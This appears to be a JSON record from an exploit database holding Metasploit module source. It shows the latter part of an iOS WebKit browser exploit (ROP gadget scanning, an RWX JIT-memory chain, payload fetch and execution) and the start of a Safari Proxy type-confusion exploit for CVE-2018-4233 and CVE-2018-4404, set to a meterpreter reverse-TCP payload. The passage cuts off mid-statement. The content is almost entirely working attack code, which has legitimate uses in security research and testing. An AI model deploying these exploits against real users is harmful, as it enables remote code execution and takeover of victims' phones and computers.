0xaa1303e1, 0xaa1703e2, 0xf94003e4, 0xd63f0100 ] ],\n // ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30];\n // ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret\n \"stackloader\": [ [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ] ],\n // mov x4, x20 ; blr x8\n \"movx4\": [ [ 0xaa1403e4, 0xd63f0100 ] ],\n }\n var opcode_libs = [\n \"/usr/lib/PN548.dylib\", // dispatch, stackloader\n \"/usr/lib/libc++.1.dylib\", // ldrx8, regloader, movx4, stackloader\n ];\n\n ' : '\n var opcodes = {\n // mov x0, x23; mov x1, x22; mov x2, x24; mov x3, x25; mov x4, x26; mov x5, x27; blr x28\n \"regloader\": [ [ 0xaa1703e0, 0xaa1603e1, 0xaa1803e2, 0xaa1903e3, 0xaa1a03e4, 0xaa1b03e5, 0xd63f0380 ] ],\n \"dispatch\": [\n // blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret\n [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ],\n // blr x21; sub sp, x29, 0x20; ldp x29, x30, [sp, 0x20]; ldp x20, x19, [sp, 0x10]; ldp x22, x21, [sp], 0x30; ret\n [ 0xd63f02a0, 0xd10083bf, 0xa9427bfd, 0xa9414ff4, 0xa8c357f6, 0xd65f03c0 ],\n ],\n \"stackloader\": [\n // ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30];\n // ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret\n [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ],\n // sub sp, x29, 0x50; ldp x29, x30, [sp, 0x50]; ldp x20, x19, [sp, 0x40]; ldp x22, x21, [sp, 0x30];\n // ldp x24, x23, [sp, 0x20]; ldp x26, x25, [sp, 0x10]; ldp x28, x27, [sp], 0x60; ret\n [ 0xd10143bf, 0xa9457bfd, 0xa9444ff4, 0xa94357f6, 0xa9425ff8, 0xa94167fa, 0xa8c66ffc, 0xd65f03c0 ],\n ],\n };\n\n var opcode_libs = [ \"/usr/lib/libLLVM.dylib\" ];\n '}\n\n var imgs = Add(hdr, memory.u32(Add(hdr, 0x18)));\n var nimgs = memory.u32(Add(hdr, 0x1c));\n for(var i = 0; i < nimgs; ++i)\n {\n var straddr = off2addr(segs, memory.u32(Add(imgs, i * 0x20 + 0x18)));\n var fn = function(i)\n {\n return memory.read(Add(straddr, i), 1)[0];\n };\n var base = Add(memory.readInt64(Add(imgs, i * 0x20)), cache_slide);\n if(opcode_libs.some(lib => strcmp(fn, lib)))\n {\n var ncmds = memory.u32(Add(base, 0x10));\n for(var j = 0, off = 0x20; j < ncmds; ++j)\n {\n var cmd = memory.u32(Add(base, off));\n if(cmd == 0x19 && strcmp(memory.read(Add(base, off + 0x8), 0x10), \"__TEXT\")) // LC_SEGMENT_64\n {\n var nsects = memory.u32(Add(base, off + 0x40));\n for(var k = 0, o = off + 0x48; k < nsects; ++k)\n {\n if(strcmp(memory.read(Add(base, o), 0x10), \"__text\"))\n {\n var keys = Object.keys(opcodes).filter(k=>!gadgets.hasOwnProperty[k])\n if (keys.length == 0) break;\n\n var addr = Add(memory.readInt64(Add(base, o + 0x20)), cache_slide)\n var size = memory.u32(Add(base, o + 0x28))\n\n // Copy the entire __text region into a Uint32Array for faster processing.\n // Previously you could map a Uint32Array over the data, but on i7+ devices\n // this caused access violations.\n // Instead we read the entire region and copy it into a Uint32Array. The\n // memory.read primitive has a weird limitation where it's only able to read\n // up to 4096 bytes. to get around this we'll read multiple times and combine\n // them into one.\n\n var allData = new Uint32Array(size / 4)\n for (var r = 0; r < size; r += 4096) {\n // Check to ensure we don't read out of the region we want\n var qty = 4096\n if (size - r < qty) {\n qty = size - r\n }\n var data = memory.read(Add(addr, r), qty)\n\n // Data is an array of single bytes. This code takes four entries\n // and converts them into a single 32-bit integer. It then adds it\n // into the `allData` array at the given index\n for (var h = 0; h < qty; h += 4) {\n var fourBytes = b2u32(data.slice(h, h + 4))\n allData[(r + h) / 4] = fourBytes\n }\n }\n\n // Loop through the entire data map looking for each gadget we need\n for (var f = 0; f < size && keys.length > 0; f++) {\n\n // Check every gadget\n for (var z = 0; z < keys.length; z++) {\n var key = keys[z];\n var opcode_list = opcodes[key];\n for (var y = 0; y < opcode_list.length; y++) {\n var opcode = opcode_list[y];\n for (var t = 0; t < opcode.length; t++) {\n var op = allData[f+t];\n if (op == opcode[t]) {\n if (t == opcode.length - 1) {\n gadgets[key] = Add(addr, f*4);\n keys.splice(z, 1);\n z = keys.length;\n break;\n }\n continue;\n }\n break;\n }\n }\n }\n }\n\n break;\n }\n o += 0x50;\n }\n break;\n }\n off += memory.u32(Add(base, off + 0x4));\n }\n continue;\n }\n var lookup = null;\n for(var k = Object.keys(libs), j = 0; j < k.length; ++j)\n {\n if(strcmp(fn, k[j]))\n {\n lookup = libs[k[j]];\n break;\n }\n }\n if(lookup != null)\n {\n fsyms(memory, base, segs, lookup, syms);\n }\n }\n\n var vals = Object.keys(libs).map(function(key) {\n return libs[key];\n });\n var k = vals.reduce(function(p,c){ c.forEach(function(e){ p.push(e) });return p; }, []);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n if(syms[s] == null)\n {\n fail(s);\n }\n syms[s] = Add(syms[s], cache_slide);\n }\n k = Object.keys(opcodes);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n if(gadgets[s] == null)\n {\n fail(s);\n }\n }\n\n offsets = {}\n offsets[\"regloader\"] = gadgets[\"regloader\"];\n offsets[\"dispatch\"] = gadgets[\"dispatch\"];\n offsets[\"stackloader\"] = gadgets[\"stackloader\"];\n offsets[\"ldrx8\"] = gadgets[\"ldrx8\"];\n offsets[\"movx4\"] = gadgets[\"movx4\"];\n offsets[\"__longjmp\"] = syms[\"__longjmp\"];\n offsets[\"__kernelrpc_mach_vm_protect_trap\"] = syms[\"__kernelrpc_mach_vm_protect_trap\"];\n offsets[\"__platform_memmove\"] = syms[\"__platform_memmove\"];\n offsets[\"_dlopen\"] = syms[\"_dlopen\"];\n offsets[\"_dlsym\"] = syms[\"_dlsym\"];\n offsets[\"_mach_task_self_\"] = syms[\"_mach_task_self_\"];\n offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"];\n offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"];\n offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] = syms[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"];\n\n if (offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] != null) {\n offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"], 8);\n }\n #{ ios_11 ? '\n if (offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] != null) {\n offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"], 8);\n }' : ''}\n\n#{dump_offsets}\n\n }\n\n\n var regloader = offsets[\"regloader\"];\n var dispatch = offsets[\"dispatch\"];\n var stackloader = offsets[\"stackloader\"];\n var longjmp = offsets[\"__longjmp\"];\n var mach_vm_protect = offsets[\"__kernelrpc_mach_vm_protect_trap\"];\n var memmove = offsets[\"__platform_memmove\"];\n var dlopen = offsets[\"_dlopen\"];\n var dlsym = offsets[\"_dlsym\"];\n var task_self = offsets[\"_mach_task_self_\"]\n var endOfFixedMem = offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"];\n var startOfFixedMem = offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"];\n\n var ldrx8 = offsets[\"ldrx8\"]; // might be null\n var movx4 = offsets[\"movx4\"]; // might be null\n\n var mach_task_self_ = new Int64(memory.readInt64(task_self).lo());\n var memPoolEnd = memory.readInt64(endOfFixedMem);\n\n var memPoolStart = Int64.Zero;\n if (startOfFixedMem) {\n memPoolStart = memory.readInt64(startOfFixedMem);\n }\n\n var jitWriteSeparateHeaps = Int64.Zero;\n if (offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]) {\n jitWriteSeparateHeaps = memory.readInt64(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]);\n }\n\n var shsz = new Int64(\"0x100000\");\n var paddr = memory.readInt64(Add(stage1.addrof(payload), 0x10));\n var codeAddr = Sub(memPoolEnd, shsz);\n codeAddr = Sub(codeAddr, codeAddr.lo() & 0x3fff);\n\n memory.writeInt64(Add(vtab, 0x18), longjmp);\n memory.writeInt64(Add(el_addr, 0x58), stackloader); // x30 (gadget)\n\n var arrsz = 0x100000,\n off = 0x1000;\n var arr = new Uint32Array(arrsz);\n var stack = memory.readInt64(Add(stage1.addrof(arr), 0x10));\n\n var pos = arrsz - off;\n\n var add_call_llvm = function(func, x0, x1, x2, x3, x4, jump_to) {\n x4 = x4 || Int64.Zero\n\n // in stackloader:\n arr[pos++] = 0xdead0010; // unused\n arr[pos++] = 0xdead0011; // unused\n arr[pos++] = 0xdead0012; // unused\n arr[pos++] = 0xdead0013; // unused\n arr[pos++] = dispatch.lo(); // x28 (gadget for regloader)\n arr[pos++] = dispatch.hi(); // x28 (gadget for regloader)\n arr[pos++] = 0xdead0014; // x27 (unused)\n arr[pos++] = 0xdead0015; // x27 (unused)\n arr[pos++] = x4.lo(); // x26 == x4 (arg5)\n arr[pos++] = x4.hi(); // x26 == x4 (arg5)\n arr[pos++] = x3.lo(); // x25 == x3 (arg4)\n arr[pos++] = x3.hi(); // x25 == x3 (arg4)\n arr[pos++] = x2.lo(); // x24 == x2 (arg3)\n arr[pos++] = x2.hi(); // x24 == x2 (arg3)\n arr[pos++] = x0.lo(); // x23 == x0 (arg1)\n arr[pos++] = x0.hi(); // x23 == x0 (arg1)\n arr[pos++] = x1.lo(); // x22 == x1 (arg2)\n arr[pos++] = x1.hi(); // x22 == x1 (arg2)\n arr[pos++] = func.lo(); // x21 (func)\n arr[pos++] = func.hi(); // x21 (func)\n arr[pos++] = 0xdbad0018; // x20 (unused)\n arr[pos++] = 0xdbad0019; // x20 (unused)\n arr[pos++] = 0xdead001a; // x19 (unused)\n arr[pos++] = 0xdead001b; // x19 (unused)\n var tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4 + 0x40).lo(); // x29\n arr[pos++] = Add(stack, tmppos*4 + 0x40).hi(); // x29\n arr[pos++] = regloader.lo(); // x30 (first gadget)\n arr[pos++] = regloader.hi(); // x30 (first gadget)\n\n // after dispatch:\n arr[pos++] = 0xdead0020; // unused\n arr[pos++] = 0xdead0021; // unused\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n arr[pos++] = 0xdead0024; // x22 (unused)\n arr[pos++] = 0xdead0025; // x22 (unused)\n arr[pos++] = 0xdead0026; // x21 (unused)\n arr[pos++] = 0xdead0027; // x21 (unused)\n arr[pos++] = 0xdead0028; // x20 (unused)\n arr[pos++] = 0xdead0029; // x20 (unused)\n arr[pos++] = 0xdead002a; // x19 (unused)\n arr[pos++] = 0xdead002b; // x19 (unused)\n tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4 + 0x70).lo(); // x29\n arr[pos++] = Add(stack, tmppos*4 + 0x70).hi(); // x29\n arr[pos++] = jump_to.lo(); // x30 (gadget)\n arr[pos++] = jump_to.hi(); // x30 (gadget)\n }\n\n var add_call_via_x8 = function(func, x0, x1, x2, x3, x4, jump_to) {\n //alert(`add_call_via_x8: ${func}(${x0}, ${x1}, ${x2}, ${x3}, ${x4}, ${jump_to})`);\n //x4 = x4 || Int64.One\n // in stackloader:\n arr[pos++] = 0xdead0010; // unused\n arr[pos++] = 0xdead0011; // unused\n arr[pos++] = 0xdead0012; // unused\n arr[pos++] = 0xdead0013; // unused\n arr[pos++] = 0xdead1101; // x28 (unused)\n arr[pos++] = 0xdead1102; // x28 (unused)\n arr[pos++] = 0xdead0014; // x27 == x6 (unused)\n arr[pos++] = 0xdead0015; // x27 == x6 (unused)\n arr[pos++] = 0xdead0016; // x26 (unused)\n arr[pos++] = 0xdead0017; // x26 (unused)\n arr[pos++] = x3.lo(); // x25 == x3 (arg4)\n arr[pos++] = x3.hi(); // x25 == x3 (arg4)\n arr[pos++] = x0.lo(); // x24 == x0 (arg1)\n arr[pos++] = x0.hi(); // x24 == x0 (arg1)\n arr[pos++] = x2.lo(); // x23 == x2 (arg3)\n arr[pos++] = x2.hi(); // x23 == x2 (arg3)\n arr[pos++] = x3.lo(); // x22 == x3 (arg4)\n arr[pos++] = x3.hi(); // x22 == x3 (arg4)\n arr[pos++] = func.lo(); // x21 (target for dispatch)\n arr[pos++] = func.hi(); // x21 (target for dispatch)\n arr[pos++] = 0xdead0018; // x20 (unused)\n arr[pos++] = 0xdead0019; // x20 (unused)\n var tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = 0xdead001c; // x29 (unused)\n arr[pos++] = 0xdead001d; // x29 (unused)\n arr[pos++] = ldrx8.lo(); // x30 (next gadget)\n arr[pos++] = ldrx8.hi(); // x30 (next gadget)\n\n // in ldrx8\n if (x4) {\n arr[pos++] = stackloader.lo();\n arr[pos++] = stackloader.hi();\n } else {\n arr[pos++] = dispatch.lo(); // x8 (target for regloader)\n arr[pos++] = dispatch.hi(); // x8 (target for regloader)\n }\n arr[pos++] = 0xdead1401; // (unused)\n arr[pos++] = 0xdead1402; // (unused)\n arr[pos++] = 0xdead1301; // x20 (unused)\n arr[pos++] = 0xdead1302; // x20 (unused)\n arr[pos++] = x1.lo(); // x19 == x1 (arg2)\n arr[pos++] = x1.hi(); // x19 == x1 (arg2)\n arr[pos++] = 0xdead1201; // x29 (unused)\n arr[pos++] = 0xdead1202; // x29 (unused)\n arr[pos++] = regloader.lo(); // x30 (next gadget)\n arr[pos++] = regloader.hi(); // x30 (next gadget)\n\n // in regloader\n // NOTE: REGLOADER DOES NOT ADJUST SP!\n // sometimes i didn't get expected value in x4\n // and i have no earthly idea why\n // usleep likely did the trick, but I would still keep the code\n // with movx4\n //arr[pos++] = x4.lo() // x4 (should be -- but see lines above)\n //arr[pos++] = x4.hi() // x4 (should be -- but see lines above)\n\n if (x4) {\n // in stackloader:\n arr[pos++] = 0xdaad0010; // unused\n arr[pos++] = 0xdaad0011; // unused\n arr[pos++] = 0xdaad0012; // unused\n arr[pos++] = 0xdaad0013; // unused\n arr[pos++] = 0xdaad1101; // x28 (unused)\n arr[pos++] = 0xdaad1102; // x28 (unused)\n arr[pos++] = 0xdaad0014; // x27 == x6 (unused)\n arr[pos++] = 0xdaad0015; // x27 == x6 (unused)\n arr[pos++] = 0xdaad0016; // x26 (unused)\n arr[pos++] = 0xdaad0017; // x26 (unused)\n arr[pos++] = 0xdaad0018; // x25 (unused)\n arr[pos++] = 0xdaad0019; // x25 (unused)\n arr[pos++] = 0xdaad00f0; // x24 (unused)\n arr[pos++] = 0xdaad00f1; // x24 (unused)\n arr[pos++] = 0xdaad00f2; // x23 (unused)\n arr[pos++] = 0xdaad00f3; // x23 (unused)\n arr[pos++] = 0xdaad00f4; // x22 (unused)\n arr[pos++] = 0xdaad00f5; // x22 (unused)\n arr[pos++] = func.lo(); // x21 (target for dispatch)\n arr[pos++] = func.hi(); // x21 (target for dispatch)\n arr[pos++] = 0xdaad0018; // x20 (unused)\n arr[pos++] = 0xdaad0019; // x20 (unused)\n tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = 0xdaad001c; // x29 (unused)\n arr[pos++] = 0xdaad001d; // x29 (unused)\n arr[pos++] = ldrx8.lo(); // x30 (next gadget)\n arr[pos++] = ldrx8.hi(); // x30 (next gadget)\n\n // in ldrx8\n arr[pos++] = dispatch.lo(); // x8 (target for movx4)\n arr[pos++] = dispatch.hi(); // x8 (target for movx4)\n arr[pos++] = 0xdaad1401; // (unused)\n arr[pos++] = 0xdaad1402; // (unused)\n arr[pos++] = x4.lo(); // x20 == x4 (arg5)\n arr[pos++] = x4.hi(); // x20 == x4 (arg5)\n arr[pos++] = 0xdaad1301; // x19 (unused)\n arr[pos++] = 0xdaad1302; // x19 (unused)\n arr[pos++] = 0xdaad1201; // x29 (unused)\n arr[pos++] = 0xdaad1202; // x29 (unused)\n arr[pos++] = movx4.lo(); // x30 (next gadget)\n arr[pos++] = movx4.hi(); // x30 (next gadget)\n }\n\n // after dispatch:\n\n // keep only one: these or 0xdeaded01\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n arr[pos++] = 0xdead0024; // x22 (unused)\n arr[pos++] = 0xdead0025; // x22 (unused)\n arr[pos++] = 0xdead0026; // x21 (unused)\n arr[pos++] = 0xdead0027; // x21 (unused)\n arr[pos++] = 0xdead0028; // x20 (unused)\n arr[pos++] = 0xdead0029; // x20 (unused)\n arr[pos++] = 0xdead002a; // x19 (unused)\n arr[pos++] = 0xdead002b; // x19 (unused)\n arr[pos++] = 0xdead002c; // x29 (unused)\n arr[pos++] = 0xdead002d; // x29 (unused)\n arr[pos++] = jump_to.lo(); // x30 (gadget)\n arr[pos++] = jump_to.hi(); // x30 (gadget)\n }\n\n var add_call = function(func, x0, x1, x2, x3, x4, jump_to) {\n x0 = x0 || Int64.Zero\n x1 = x1 || Int64.Zero\n x2 = x2 || Int64.Zero\n x3 = x3 || Int64.Zero\n jump_to = jump_to || stackloader\n\n return (ldrx8 ? add_call_via_x8 : add_call_llvm)(\n func, x0, x1, x2, x3, x4, jump_to\n )\n }\n\n #{ios_11 ? '\n if (jitWriteSeparateHeaps.lo() || jitWriteSeparateHeaps.hi()) {\n add_call(jitWriteSeparateHeaps\n , Sub(codeAddr, memPoolStart) // off\n , paddr // src\n , shsz // size\n );\n } else {\n fail(\"jitWrite\");\n }\n ' : '\n add_call(mach_vm_protect,\n mach_task_self_, // task\n codeAddr, // addr\n shsz, // size\n new Int64(0), // set maximum\n new Int64(7) // prot (RWX)\n );\n\n add_call(memmove,\n codeAddr, // dst\n paddr, // src\n shsz // size\n );\n '}\n\n add_call(codeAddr,\n dlopen,\n dlsym,\n jitWriteSeparateHeaps,\n memPoolStart,\n memPoolEnd,\n );\n\n for(var i = 0; i < 0x20; ++i)\n {\n arr[pos++] = 0xde00c0de + (i<<16);\n }\n\n var sp = Add(stack, (arrsz - off) * 4);\n memory.writeInt64(Add(el_addr, 0x60), Add(sp, 0x60)); // x29\n memory.writeInt64(Add(el_addr, 0x68), sp); // x2 (copied into sp)\n\n // trigger\n //print(\"u rdy?\")\n wrapper.addEventListener(\"click\", function(){});\n\n}\n\n#{get_mem_rw}\n\nfunction go() {\n try {\n var req = new XMLHttpRequest;\n req.open(\"GET\", \"exploit\");\n req.responseType = \"arraybuffer\";\n req.addEventListener(\"load\", function() {\n try {\n if (req.responseType != \"arraybuffer\") throw \"y u no blob\";\n payload.set(new Uint8Array(req.response), 0x0);\n pwn();\n } catch (e) {\n fail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\"))\n }\n });\n req.addEventListener(\"error\", function(ev) {\n fail(ev)\n });\n req.send()\n } catch (e) {\n fail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\"))\n }\n};\n\ngo();\n\n</script>\n</body>\n</html>\n ^\n unless datastore['DEBUG_EXPLOIT']\n html.gsub!(/\\/\\/.*$/, '') # strip comments\n html.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\n end\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/apple_ios/browser/webkit_createthis.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2018-12-25T18:50:54", "description": "", "cvss3": {}, "published": "2018-12-13T00:00:00", "type": "packetstorm", "title": "Safari Proxy Object Type Confusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-4404", "CVE-2018-4233"], "modified": "2018-12-13T00:00:00", "id": "PACKETSTORM:150779", "href": "https://packetstormsecurity.com/files/150779/Safari-Proxy-Object-Type-Confusion.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Safari Proxy Object Type Confusion', \n'Description' => %q{ \nThis module exploits a type confusion bug in the Javascript Proxy object in \nWebKit. The DFG JIT does not take into account that, through the use of a Proxy, \nit is possible to run arbitrary JS code during the execution of a CreateThis \noperation. This makes it possible to change the structure of e.g. an argument \nwithout causing a bailout, leading to a type confusion (CVE-2018-4233). \n \nThe JIT region is then replaced with shellcode which loads the second stage. \nThe second stage exploits a logic error in libxpc, which uses command execution \nvia the launchd's \"spawn_via_launchd\" API (CVE-2018-4404). \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'saelo' ], \n'References' => [ \n['CVE', '2018-4233'], \n['CVE', '2018-4404'], \n['URL', 'https://github.com/saelo/cve-2018-4233'], \n['URL', 'https://github.com/saelo/pwn2own2018'], \n['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'], \n], \n'Arch' => [ ARCH_PYTHON, ARCH_CMD ], \n'Platform' => 'osx', \n'DefaultTarget' => 0, \n'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }, \n'Targets' => [ \n[ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ], \n[ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ], \n], \n'DisclosureDate' => 'Mar 15 2018')) \nregister_advanced_options([ \nOptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]), \n]) \nend \n \ndef offset_table \n{ \n'10.12.6' => { \n:jsc_vtab => '0x0000d8d8', \n:dyld_stub_loader => '0x00001168', \n:dlopen => '0x000027f7', \n:confstr => '0x00002c84', \n:strlen => '0x00001b40', \n:strlen_got => '0xdc0', \n}, \n'10.13' => { \n:jsc_vtab => '0x0000e5f8', \n:dyld_stub_loader => '0x000012a8', \n:dlopen => '0x00002e60', \n:confstr => '0x000024fc', \n:strlen => '0x00001440', \n:strlen_got => '0xee8', \n}, \n'10.13.3' => { \n:jsc_vtab => '0xe5e8', \n:dyld_stub_loader => '0x1278', \n:dlopen => '0x2e30', \n:confstr => '0x24dc', \n:strlen => '0x1420', \n:strlen_got => '0xee0', \n}, \n} \nend \n \ndef exploit_data(directory, file) \npath = ::File.join Msf::Config.data_directory, 'exploits', directory, file \n::File.binread path \nend \n \ndef stage1_js \nstage1 = exploit_data \"CVE-2018-4233\", \"stage1.bin\" \n\"var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);\" \nend \n \ndef stage2_js \nstage2 = exploit_data \"CVE-2018-4404\", \"stage2.dylib\" \npayload_cmd = payload.raw \nif target['Arch'] == ARCH_PYTHON \npayload_cmd = \"echo \\\"#{payload_cmd}\\\" | python\" \nend \nplaceholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER') \nstage2[placeholder_index, payload_cmd.length] = payload_cmd \n\"var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);\" \nend \n \ndef get_offsets(user_agent) \nif user_agent =~ /Intel Mac OS X (.*?)\\)/ \nversion = $1.gsub(\"_\", \".\") \nmac_osx_version = Gem::Version.new(version) \nif mac_osx_version >= Gem::Version.new('10.13.4') \nprint_warning \"macOS version #{mac_osx_version} is not vulnerable\" \nelsif mac_osx_version < Gem::Version.new('10.12') \nprint_warning \"macOS version #{mac_osx_version} is not vulnerable\" \nelsif offset_table.key?(version) \noffset = offset_table[version] \nreturn <<-EOF \nconst JSC_VTAB_OFFSET = #{offset[:jsc_vtab]}; \nconst DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]}; \nconst DLOPEN_OFFSET = #{offset[:dlopen]}; \nconst CONFSTR_OFFSET = #{offset[:confstr]}; \nconst STRLEN_OFFSET = #{offset[:strlen]}; \nconst STRLEN_GOT_OFFSET = #{offset[:strlen_got]}; \nEOF \nelse \nprint_warning \"No offsets for version #{mac_osx_version}\" \nend \nelse \nprint_warning \"Unexpected User-Agent\" \nend \nreturn false \nend \n \ndef on_request_uri(cli, request) \nuser_agent = request['User-Agent'] \nprint_status(\"Request from #{user_agent}\") \noffsets = get_offsets(user_agent) \nunless offsets \nsend_not_found(cli) \nreturn \nend \n \nutils = exploit_data \"CVE-2018-4233\", \"utils.js\" \nint64 = exploit_data \"CVE-2018-4233\", \"int64.js\" \nhtml = %Q^ \n<html> \n<body> \n<script> \n#{stage1_js} \nstage1.replace = function(oldVal, newVal) { \nfor (var idx = 0; idx < this.length; idx++) { \nvar found = true; \nfor (var j = idx; j < idx + 8; j++) { \nif (this[j] != oldVal.byteAt(j - idx)) { \nfound = false; \nbreak; \n} \n} \nif (found) \nbreak; \n} \nthis.set(newVal.bytes(), idx); \n}; \n#{stage2_js} \n#{utils} \n#{int64} \n#{offsets} \n \nvar ready = new Promise(function(resolve) { \nif (typeof(window) === 'undefined') \nresolve(); \nelse \nwindow.onload = function() { \nresolve(); \n} \n}); \n \nready = Promise.all([ready]); \n \nprint = function(msg) { \n//console.log(msg); \n//document.body.innerText += msg + '\\\\n'; \n} \n \n// Must create this indexing type transition first, \n// otherwise the JIT will deoptimize later. \nvar a = [13.37, 13.37]; \na[0] = {}; \n \nvar referenceFloat64Array = new Float64Array(0x1000); \n \n// \n// Bug: the DFG JIT does not take into account that, through the use of a \n// Proxy, it is possible to run arbitrary JS code during the execution of a \n// CreateThis operation. This makes it possible to change the structure of e.g. \n// an argument without causing a bailout, leading to a type confusion. \n// \n \n// \n// addrof primitive \n// \nfunction setupAddrof() { \nfunction InfoLeaker(a) { \nthis.address = a[0]; \n} \n \nvar trigger = false; \nvar leakme = null; \nvar arg = null; \n \nvar handler = { \nget(target, propname) { \nif (trigger) \narg[0] = leakme; \nreturn target[propname]; \n}, \n}; \nvar InfoLeakerProxy = new Proxy(InfoLeaker, handler); \n \nfor (var i = 0; i < 100000; i++) { \nnew InfoLeakerProxy([1.1, 2.2, 3.3]); \n} \n \ntrigger = true; \n \nreturn function(obj) { \nleakme = obj; \narg = [1.1, 1.1]; \nvar o = new InfoLeakerProxy(arg); \nreturn o.address; \n}; \n} \n \n// \n// fakeobj primitive \n// \nfunction setupFakeobj() { \nfunction ObjFaker(a, address) { \na[0] = address; \n} \n \nvar trigger = false; \nvar arg = null; \n \nvar handler = { \nget(target, propname) { \nif (trigger) \narg[0] = {}; \nreturn target[propname]; \n}, \n}; \nvar ObjFakerProxy = new Proxy(ObjFaker, handler); \n \nfor (var i = 0; i < 100000; i++) { \nnew ObjFakerProxy([1.1, 2.2, 3.3], 13.37); \n} \n \ntrigger = true; \n \nreturn function(address) { \narg = [1.1, 1.1]; \nvar o = new ObjFakerProxy(arg, address); \nreturn arg[0]; \n}; \n} \n \nfunction makeJITCompiledFunction() { \n// Some code to avoid inlining... \nfunction target(num) { \nfor (var i = 2; i < num; i++) { \nif (num % i === 0) { \nreturn false; \n} \n} \nreturn true; \n} \n \n// Force JIT compilation. \nfor (var i = 0; i < 1000; i++) { \ntarget(i); \n} \nfor (var i = 0; i < 1000; i++) { \ntarget(i); \n} \nfor (var i = 0; i < 1000; i++) { \ntarget(i); \n} \nreturn target; \n} \n \nfunction pwn() { \n// Spray Float64Array structures so that structure ID 0x1000 will \n// be a Float64Array with very high probability \nvar structs = []; \nfor (var i = 0; i < 0x1000; i++) { \nvar a = new Float64Array(1); \na['prop' + i] = 1337; \nstructs.push(a); \n} \n \n// Setup exploit primitives \nvar addrofOnce = setupAddrof(); \nvar fakeobjOnce = setupFakeobj(); \n \n// (Optional) Spray stuff to keep the background GC busy and increase reliability even further \n/* \nvar stuff = []; \nfor (var i = 0; i < 0x100000; i++) { \nstuff.push({foo: i}); \n} \n*/ \n \nvar float64MemView = new Float64Array(0x200); \nvar uint8MemView = new Uint8Array(0x1000); \n \n// Setup container to host the fake Float64Array \nvar jsCellHeader = new 